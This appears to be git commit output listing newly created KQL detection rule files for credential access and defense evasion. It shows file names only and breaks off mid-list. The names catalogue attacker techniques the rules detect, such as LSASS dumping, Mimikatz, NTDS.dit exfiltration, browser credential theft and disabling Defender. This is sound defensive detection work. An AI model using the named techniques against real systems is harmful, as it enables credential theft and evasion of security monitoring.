KQL/rules/Credential Access/esentutl_gather_credentials.kql create mode 100644 KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql create mode 100644 KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql create mode 100644 KQL/rules/Credential Access/findstr_gpp_passwords.kql create mode 100644 KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql create mode 100644 KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql create mode 100644 KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql create mode 100644 KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql create mode 100644 KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql create mode 100644 KQL/rules/Credential Access/hacktool_inveigh_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_krbrelay_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_lazagne_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_mimikatz_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql create mode 100644 KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql create mode 100644 KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql create mode 100644 KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql create mode 100644 KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql create mode 100644 KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql create mode 100644 KQL/rules/Credential Access/hacktool_safetykatz_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_securityxploded_execution.kql create mode 100644 KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql create mode 100644 KQL/rules/Credential Access/hacktool_winpwn_execution.kql create mode 100644 KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql create mode 100644 KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql create mode 100644 KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql create mode 100644 KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql create mode 100644 KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql create mode 100644 KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql create mode 100644 KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql create mode 100644 KQL/rules/Credential Access/lsass_process_memory_dump_files.kql create mode 100644 KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql create mode 100644 KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql create mode 100644 KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql create mode 100644 KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql create mode 100644 KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql create mode 100644 KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql create mode 100644 KQL/rules/Credential Access/ntds_dit_created.kql create mode 100644 KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql create mode 100644 KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql create mode 100644 KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql create mode 100644 KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql create mode 100644 KQL/rules/Credential Access/potential_browser_data_stealing.kql create mode 100644 KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql create mode 100644 KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql create mode 100644 KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql create mode 100644 KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql create mode 100644 KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql create mode 100644 KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql create mode 100644 KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql create mode 100644 KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql create mode 100644 KQL/rules/Credential Access/potential_sam_database_dump.kql create mode 100644 KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql create mode 100644 KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql create mode 100644 KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql create mode 100644 KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql create mode 100644 KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql create mode 100644 KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql create mode 100644 KQL/rules/Credential Access/powershell_get_process_lsass.kql create mode 100644 KQL/rules/Credential Access/powershell_sam_copy.kql create mode 100644 KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql create mode 100644 KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql create mode 100644 KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql create mode 100644 KQL/rules/Credential Access/pua_mouse_lock_execution.kql create mode 100644 KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql create mode 100644 KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql create mode 100644 KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql create mode 100644 KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql create mode 100644 KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql create mode 100644 KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql create mode 100644 KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql create mode 100644 KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql create mode 100644 KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql create mode 100644 KQL/rules/Credential Access/suspicious_history_file_operations.kql create mode 100644 KQL/rules/Credential Access/suspicious_key_manager_access.kql create mode 100644 KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql create mode 100644 KQL/rules/Credential Access/suspicious_reg_add_open_command.kql create mode 100644 KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql create mode 100644 KQL/rules/Credential Access/suspicious_system_user_process_creation.kql create mode 100644 KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql create mode 100644 KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql create mode 100644 KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql create mode 100644 KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql create mode 100644 KQL/rules/Credential Access/wce_wceaux_dll_access.kql create mode 100644 KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql create mode 100644 KQL/rules/Credential Access/windows_credential_editor_registry.kql create mode 100644 KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql create mode 100644 KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql create mode 100644 KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql create mode 100644 KQL/rules/Defense Evasion/abusing_print_executable.kql create mode 100644 KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql create mode 100644 KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql create mode 100644 KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql create mode 100644 KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql create mode 100644 KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql create mode 100644 KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql create mode 100644 KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql create mode 100644 KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql create mode 100644 KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql create mode 100644 KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql create mode 100644 KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql create mode 100644 KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql create mode 100644 KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql create mode 100644 KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql create mode 100644 KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql create mode 100644 KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql create mode 100644 KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql create mode 100644 KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql create mode 100644 KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/aspnetcompiler_execution.kql create mode 100644 KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql create mode 100644 KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql create mode 100644 KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql create mode 100644 KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql create mode 100644 KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql create mode 100644 KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql create mode 100644 KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql create mode 100644 KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql create mode 100644 KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql create mode 100644 KQL/rules/Defense Evasion/binary_padding_macos.kql create mode 100644 KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql create mode 100644 KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql create mode 100644 KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql create mode 100644 KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql create mode 100644 KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql create mode 100644 KQL/rules/Defense Evasion/chmod_suspicious_directory.kql create mode 100644 KQL/rules/Defense Evasion/clear_linux_logs.kql create mode 100644 KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql create mode 100644 KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql create mode 100644 KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql create mode 100644 KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql create mode 100644 KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql create mode 100644 KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql create mode 100644 KQL/rules/Defense Evasion/connection_proxy.kql create mode 100644 KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql create mode 100644 KQL/rules/Defense Evasion/createdump_process_dump.kql create mode 100644 KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql create mode 100644 KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql create mode 100644 KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql create mode 100644 KQL/rules/Defense Evasion/decode_base64_encoded_text.kql create mode 100644 KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql create mode 100644 KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql create mode 100644 KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql create mode 100644 KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql create mode 100644 KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql create mode 100644 KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql create mode 100644 KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql create mode 100644 KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql create mode 100644 KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql create mode 100644 KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql create mode 100644 KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql create mode 100644 KQL/rules/Defense Evasion/disable_or_stop_services.kql create mode 100644 KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql create mode 100644 KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql create mode 100644 KQL/rules/Defense Evasion/disable_security_tools.kql create mode 100644 KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql create mode 100644 KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql create mode 100644 KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql create mode 100644 KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql create mode 100644 KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql create mode 100644 KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql create mode 100644 KQL/rules/Defense Evasion/disabled_ie_security_features.kql create mode 100644 KQL/rules/Defense Evasion/disabled_volume_snapshots.kql create mode 100644 KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql create mode 100644 KQL/rules/Defense Evasion/disabling_security_tools.kql create mode 100644 KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql create mode 100644 KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql create mode 100644 KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql create mode 100644 KQL/rules/Defense Evasion/dism_remove_online_package.kql create mode 100644 KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql create mode 100644 KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql create mode 100644 KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql create mode 100644 KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql create mode 100644 KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql create mode 100644 KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql create mode 100644 KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql create mode 100644 KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql create mode 100644 KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql create mode 100644 KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql create mode 100644 KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql create mode 100644 KQL/rules/Defense Evasion/dumpminitool_execution.kql create mode 100644 KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql create mode 100644 KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql create mode 100644 KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql create mode 100644 KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql create mode 100644 KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql create mode 100644 KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql create mode 100644 KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql create mode 100644 KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql create mode 100644 KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql create mode 100644 KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql create mode 100644 KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql create mode 100644 KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql create mode 100644 KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql create mode 100644 KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql create mode 100644 KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql create mode 100644 KQL/rules/Defense Evasion/execution_of_non_existing_file.kql create mode 100644 KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql create mode 100644 KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql create mode 100644 KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql create mode 100644 KQL/rules/Defense Evasion/explorer_process_tree_break.kql create mode 100644 KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql create mode 100644 KQL/rules/Defense Evasion/file_deletion.kql create mode 100644 KQL/rules/Defense Evasion/file_deletion_via_del.kql create mode 100644 KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql create mode 100644 KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql create mode 100644 KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql create mode 100644 KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql create mode 100644 KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql create mode 100644 KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql create mode 100644 KQL/rules/Defense Evasion/file_download_with_headless_browser.kql create mode 100644 KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/file_time_attribute_change.kql create mode 100644 KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql create mode 100644 KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql create mode 100644 KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql create mode 100644 KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql create mode 100644 KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql create mode 100644 KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql create mode 100644 KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql create mode 100644 KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql create mode 100644 KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql create mode 100644 KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql create mode 100644 KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql create mode 100644 KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql create mode 100644 KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql create mode 100644 KQL/rules/Defense Evasion/gpscript_execution.kql create mode 100644 KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_powertool_execution.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql create mode 100644 KQL/rules/Defense Evasion/hacktool_xordump_execution.kql create mode 100644 KQL/rules/Defense Evasion/hh_exe_execution.kql create mode 100644 KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql create mode 100644 KQL/rules/Defense Evasion/hidden_user_creation.kql create mode 100644 KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql create mode 100644 KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql create mode 100644 KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql create mode 100644 KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql create mode 100644 KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql create mode 100644 KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql create mode 100644 KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql create mode 100644 KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql create mode 100644 KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql create mode 100644 KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql create mode 100644 KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql create mode 100644 KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql create mode 100644 KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql create mode 100644 KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql create mode 100644 KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql create mode 100644 KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql create mode 100644 KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql create mode 100644 KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql create mode 100644 KQL/rules/Defense Evasion/install_root_certificate.kql create mode 100644 KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql create mode 100644 KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql create mode 100644 KQL/rules/Defense Evasion/jscript_compiler_execution.kql create mode 100644 KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql create mode 100644 KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql create mode 100644 KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql create mode 100644 KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql create mode 100644 KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql create mode 100644 KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql create mode 100644 KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql create mode 100644 KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql create mode 100644 KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql create mode 100644 KQL/rules/Defense Evasion/linux_doas_tool_execution.kql create mode 100644 KQL/rules/Defense Evasion/linux_package_uninstall.kql create mode 100644 KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql create mode 100644 KQL/rules/Defense Evasion/livekd_driver_creation.kql create mode 100644 KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql create mode 100644 KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql create mode 100644 KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql create mode 100644 KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql create mode 100644 KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql create mode 100644 KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql create mode 100644 KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql create mode 100644 KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql create mode 100644 KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql create mode 100644 KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql create mode 100644 KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql create mode 100644 KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql create mode 100644 KQL/rules/Defense Evasion/modify_group_policy_settings.kql create mode 100644 KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql create mode 100644 KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql create mode 100644 KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql create mode 100644 KQL/rules/Defense Evasion/msiexec_quiet_installation.kql create mode 100644 KQL/rules/Defense Evasion/msiexec_web_install.kql create mode 100644 KQL/rules/Defense Evasion/msxsl_exe_execution.kql create mode 100644 KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql create mode 100644 KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql create mode 100644 KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql create mode 100644 KQL/rules/Defense Evasion/new_file_association_using_exefile.kql create mode 100644 KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql create mode 100644 KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql create mode 100644 KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql create mode 100644 KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/node_process_executions.kql create mode 100644 KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql create mode 100644 KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql create mode 100644 KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql create mode 100644 KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql create mode 100644 KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql create mode 100644 KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql create mode 100644 KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql create mode 100644 KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql create mode 100644 KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql create mode 100644 KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql create mode 100644 KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql create mode 100644 KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql create mode 100644 KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql create mode 100644 KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql create mode 100644 KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql create mode 100644 KQL/rules/Defense Evasion/ping_hex_ip.kql create mode 100644 KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql create mode 100644 KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql create mode 100644 KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql create mode 100644 KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql create mode 100644 KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql create mode 100644 KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql create mode 100644 KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql create mode 100644 KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql create mode 100644 KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql create mode 100644 KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql create mode 100644 KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql create mode 100644 KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql create mode 100644 